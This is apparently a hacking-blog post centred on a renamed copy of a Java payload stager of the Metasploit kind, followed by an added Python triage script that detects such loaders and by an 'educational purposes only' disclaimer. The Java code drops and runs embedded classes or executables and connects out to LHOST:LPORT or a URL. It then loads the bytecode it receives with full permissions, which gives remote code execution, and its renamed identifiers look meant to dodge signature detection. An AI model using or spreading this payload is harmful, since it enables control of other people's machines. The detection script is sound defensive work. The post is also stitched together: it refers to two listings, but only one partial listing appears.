properties.put("Dr0ppExecutable", gayfile2.getCanonicalPath());

}
int i = Integer.parseInt(properties.getProperty("0Gay", "0"));

String zero2 = properties.getProperty("Dr0pExecutable");

if(i > 0)
{
properties.setProperty("0Gay", String.valueOf(i - 1));

File gayfile3 = File.createTempFile("~0Gay", ".SecurityisjustanIllusion");

gayfile3.delete();
File gayfile5 = new File(gayfile3.getAbsolutePath() + ".dir");

File gayfile6 = new File(gayfile5, "SecurityisjustanIllusion.dat");

File gayfile7 = new File(gayfile5, s);

gayfile7.getParentFile().mkdirs();

writeEmbeddedFile(play1, s, gayfile7);

if(properties.getProperty("URL", "").startsWith("https:"))

writeEmbeddedFile(play1, "Gamesploit/GameloadTrust0Manager.class", new File(gayfile7.getParentFile(), "Gameload0TrustManager.class"));

if(properties.getProperty("AESPassword", null) != null)

writeEmbeddedFile(play1, "Gamesploit/AESEncryption.class", new File(gayfile7.getParentFile(), "AESEncryption.class"));

FileOutputStream fileoutputstream = new FileOutputStream(gayfile6);

properties.store(fileoutputstream, "");

fileoutputstream.close();

Process process = Runtime.getRuntime().exec(new String[] {

getJreExecutable("java"), "-classpath", gayfile5.getAbsolutePath(), play1.getName()

});
process.getInputStream().close();

process.getErrorStream().close();

Thread.sleep(2000L);

File afile[] = {

gayfile7, gayfile7.getParentFile(), gayfile6, gayfile5

};
for(int k = 0; k < afile.length; k++)
{
for(int l = 0; l < 10 && !afile[k].delete(); l++)
{
afile[k].deleteOnExit();

Thread.sleep(100L);
}

}

} else
if(zero2 != null)
{
File gayfile4 = new File(zero2);
if(!IS_WIN)
try
{
try
{
(java.io.File.class).getMethod("setExecutable", new Class[] {

Boolean.TYPE

}).invoke(gayfile4, new Object[] {

Boolean.TRUE
});
}
catch(NoSuchMethodException nosuchmethodexception)
{
Runtime.getRuntime().exec(new String[] {
"chmod", "+x", zero2
}).waitFor();
}
}
catch(Exception exception)
{
exception.printStackTrace();
}
Runtime.getRuntime().exec(new String[] {
zero2
});
if(!IS_WIN)
{
gayfile4.delete();
gayfile4.getParentFile().delete();
}
} else
{
int j = Integer.parseInt(properties.getProperty("LPORT", "31337"));

String zero3 = properties.getProperty("LHOST", null);

String zero4 = properties.getProperty("URL", null);

Object zeroobj;
Object zeroobj1;
if(j <= 0)
{
zeroobj = System.in;

zeroobj1 = System.out;

} else
if(zero4 != null)
{
if(zero4.startsWith("raw:"))

zeroobj = new ByteArrayInputStream(zero4.substring(4).getBytes("ISO-8859-1"));
else

if(zero4.startsWith("https:"))

{
URLConnection urlconnection = (new URL(zero4)).openConnection();

Class.forName("Gamesploit.GameloadTrustManager").getMethod("useFor", new Class[] {
java.net.URLConnection.class
}).invoke(null, new Object[] {
urlconnection
});
zeroobj = urlconnection.getInputStream();
} else
{
zeroobj = (new URL(zero4)).openStream();
}
zeroobj1 = new ByteArrayOutputStream();
} else
{
Socket socket;
if(zero3 != null)
{
socket = new Socket(zero3, j);
} else
{
ServerSocket gaysocket = new ServerSocket(j);
socket = gaysocket.accept();
gaysocket.close();
}
zeroobj = socket.getInputStream();
zeroobj1 = socket.getOutputStream();
}
String zero5 = properties.getProperty("AESPassword", null);
if(zero5 != null)
{
Object aobj[] = (Object[])Class.forName("Gamesploit.AESEncryption").getMethod("wrapStreams", new Class[] {
java.io.InputStream.class, java.io.OutputStream.class, java.lang.String.class
}).invoke(null, new Object[] {
zeroobj, zeroobj1, zero5
});
zeroobj = (InputStream)aobj[0];
zeroobj1 = (OutputStream)aobj[1];
}
StringTokenizer stringtokenizer = new StringTokenizer("Gaylo0ad -- " + properties.getProperty("Para", ""), " ");
String args1[] = new String[stringtokenizer.countTokens()];
for(int i1 = 0; i1 < args1.length; i1++)
args1[i1] = stringtokenizer.nextToken();

(new Gameload()).bootstrap(((InputStream) (zeroobj)), ((OutputStream) (zeroobj1)), properties.getProperty("Emage", null), args1);
}
}

private static void writeEmbeddedFile(@SuppressWarnings("rawtypes") Class play1, String s, File file)
throws FileNotFoundException, IOException
{
InputStream inputstream = play1.getResourceAsStream("/" + s);
FileOutputStream fileoutputstream = new FileOutputStream(file);
byte abyte0[] = new byte[4096];
int i;
while((i = inputstream.read(abyte0)) != -1)
fileoutputstream.write(abyte0, 0, i);
fileoutputstream.close();
}

@SuppressWarnings("unchecked")
private final void bootstrap(InputStream inputstream, OutputStream outputstream, String s, String as[])
throws Exception
{
try
{
DataInputStream datainputstream = new DataInputStream(inputstream);
Permissions permissions = new Permissions();
permissions.add(new AllPermission());
ProtectionDomain protectiondomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), permissions);
@SuppressWarnings("rawtypes")
Class play1;
if(s == null)
{
int i = datainputstream.readInt();
do
{
byte abyte0[] = new byte[i];
datainputstream.readFully(abyte0);
resolveClass(play1 = defineClass(null, abyte0, 0, i, protectiondomain));
i = datainputstream.readInt();
} while(i > 0);
} else
{
play1 = Class.forName("gameload.woot." + s);
}
Object obj = play1.newInstance();
play1.getMethod("start", new Class[] {
java.io.DataInputStream.class, java.io.OutputStream.class, java.lang.String[].class
}).invoke(obj, new Object[] {
datainputstream, outputstream, as
});
}
catch(Throwable throwable)
{
throwable.printStackTrace(new PrintStream(outputstream));
}
}


private static String getJreExecutable(String s)
{
File file = null;
if(IS_GAME)
file = findInDir(GAY_HOME + "/sh", s);
if(file == null)
file = findInDir(GAY_HOME + "/bin", s);
if(file != null)
return file.getAbsolutePath();
else
return addExtension(s);
}

private static String addExtension(String s)
{
return s + (IS_WIN ? ".exe" : "");
}

private static File findInDir(String s, String s1)
{
File gayfile = normalize(s);
File gayfile1 = null;
if(gayfile.exists())
{
gayfile1 = new File(gayfile, addExtension(s1));
if(!gayfile1.exists())
gayfile1 = null;
}
return gayfile1;
}

@SuppressWarnings("unchecked")
private static File normalize(String s)
{
@SuppressWarnings("rawtypes")
Stack gay = new Stack();
String as[] = dissect(s);
gay.push(as[0]);
StringTokenizer stringtokenizer = new StringTokenizer(as[1], File.separator);
do
{
if(!stringtokenizer.hasMoreTokens())
break;
String zero1 = stringtokenizer.nextToken();
if(!".".equals(zero1))
if("..".equals(zero1))
{
if(gay.size() < 2)
return new File(s);
gay.pop();
} else
{
gay.push(zero1);
}
} while(true);
StringBuffer gaybuffer = new StringBuffer();
for(int i = 0; i < gay.size(); i++)
{
if(i > 1)
gaybuffer.append(File.separatorChar);
gaybuffer.append(gay.elementAt(i));
}

return new File(gaybuffer.toString());
}

private static String[] dissect(String s)
{
char c = File.separatorChar;
s = s.replace('/', c).replace('\\', c);
String zero1 = null;
int i = s.indexOf(':');
if(i > 0 && IS_WIN)
{
int j = i + 1;
zero1 = s.substring(0, j);
char ac[] = s.toCharArray();
zero1 = zero1 + c;
j = ac[j] != c ? j : j + 1;
StringBuffer stringbuffer = new StringBuffer();
for(int l = j; l < ac.length; l++)
if(ac[l] != c || ac[l - 1] != c)
stringbuffer.append(ac[l]);

s = stringbuffer.toString();
} else
if(s.length() > 1 && s.charAt(1) == c)
{
int k = s.indexOf(c, 2);
k = s.indexOf(c, k + 1);
zero1 = k <= 2 ? s : s.substring(0, k + 1);
s = s.substring(zero1.length());
} else
{
zero1 = File.separator;
s = s.substring(1);
}
return (new String[] {
zero1, s
});
}

private static final String GAME_NAME;
private static final String PATH_SEP = System.getProperty("path.separator");
private static final boolean IS_GAME;
private static final boolean IS_WIN = PATH_SEP.equals(";");
private static final String GAY_HOME = System.getProperty("java.home");

static
{
GAME_NAME = System.getProperty("os.name").toLowerCase(Locale.ENGLISH);
IS_GAME = "gam".equals(GAME_NAME);
}
}



Have pfun ….



Use it for Personal use or study purposes.
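The two listings above differ only in names: both classes still extend `ClassLoader`, call `defineClass`, grant `AllPermission` and read from a network stream, and those references stay in the class file's constant pool. The following is an added example, not code from the original post: a triage check that parses the constant pool and scores those structural traits. The sample class files are constructed stubs (header and constant pool only), and `com/example/PluginLoader` is a hypothetical benign loader.

```python
import struct

# Constant-pool tags with a fixed payload size in bytes (JVM class-file format).
FIXED = {3: 4, 4: 4, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4, 12: 4,
         15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}
NETWORK = {"java/net/Socket", "java/net/ServerSocket", "java/net/URL"}


def parse_class(data):
    """Read the constant pool and the this/super class names of a .class file."""
    try:
        magic, _minor, _major, count = struct.unpack_from(">IHHH", data, 0)
        if magic != 0xCAFEBABE:
            raise ValueError("not a Java class file")
        pos, idx, utf8, classes = 10, 1, {}, {}
        while idx < count:
            tag = data[pos]
            pos += 1
            if tag == 1:                                  # CONSTANT_Utf8
                size = struct.unpack_from(">H", data, pos)[0]
                utf8[idx] = data[pos + 2:pos + 2 + size].decode("utf-8", "replace")
                pos += 2 + size
            elif tag in (5, 6):                           # Long/Double use two slots
                pos += 8
                idx += 1
            elif tag in FIXED:
                if tag == 7:                              # CONSTANT_Class -> name index
                    classes[idx] = struct.unpack_from(">H", data, pos)[0]
                pos += FIXED[tag]
            else:
                raise ValueError("unknown constant-pool tag %d" % tag)
            idx += 1
        _flags, this_i, super_i = struct.unpack_from(">HHH", data, pos)
    except (struct.error, IndexError):
        raise ValueError("truncated class file")

    def class_name(i):
        return utf8.get(classes.get(i, 0), "")

    return {"this": class_name(this_i), "super": class_name(super_i),
            "class_refs": {utf8.get(v, "") for v in classes.values()},
            "strings": set(utf8.values())}


def triage(data):
    """Score traits that survive renaming of classes, resources and properties."""
    info = parse_class(data)
    traits = []
    if info["super"] == "java/lang/ClassLoader":
        traits.append("extends-ClassLoader")
    if "defineClass" in info["strings"]:     # over-approximation: any Utf8 entry counts
        traits.append("calls-defineClass")
    if "java/security/AllPermission" in info["class_refs"]:
        traits.append("grants-AllPermission")
    if info["class_refs"] & NETWORK:
        traits.append("opens-network-stream")
    return {"class": info["this"], "traits": traits, "suspicious": len(traits) == 4}


def build_class(this_name, super_name, class_refs, method_names):
    """Assemble a constructed stub: header, constant pool, access flags, this/super."""
    pool = []

    def utf8(text):
        raw = text.encode()
        pool.append(b"\x01" + struct.pack(">H", len(raw)) + raw)
        return len(pool)                      # constant-pool indices are 1-based

    def klass(text):
        pool.append(b"\x07" + struct.pack(">H", utf8(text)))
        return len(pool)

    this_i, super_i = klass(this_name), klass(super_name)
    for ref in class_refs:
        klass(ref)
    for name in method_names:
        utf8(name)
    return (struct.pack(">IHHH", 0xCAFEBABE, 0, 49, len(pool) + 1) + b"".join(pool)
            + struct.pack(">HHH", 0x0021, this_i, super_i))


# Constructed samples mirroring the references visible in the two listings.
STAGER_REFS = ["java/security/AllPermission", "java/security/ProtectionDomain",
               "java/net/Socket", "java/io/DataInputStream"]
ORIGINAL = build_class("metasploit/Payload", "java/lang/ClassLoader",
                       STAGER_REFS, ["defineClass", "readInt"])
RENAMED = build_class("sploit/Gameload", "java/lang/ClassLoader",
                      STAGER_REFS, ["defineClass", "readInt"])
BENIGN = build_class("com/example/PluginLoader", "java/lang/ClassLoader",
                     ["java/net/URL"], ["defineClass"])

if __name__ == "__main__":
    for sample in (ORIGINAL, RENAMED, BENIGN):
        print(triage(sample))
```

A hit is a reason to look closer, not a verdict: the benign loader shares three of the four traits and is separated only by the `AllPermission` grant.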

[#] iNFO [#]

All the information provided on this site is for educational purposes only.
 
The site and its author are in no way responsible for any misuse of the information.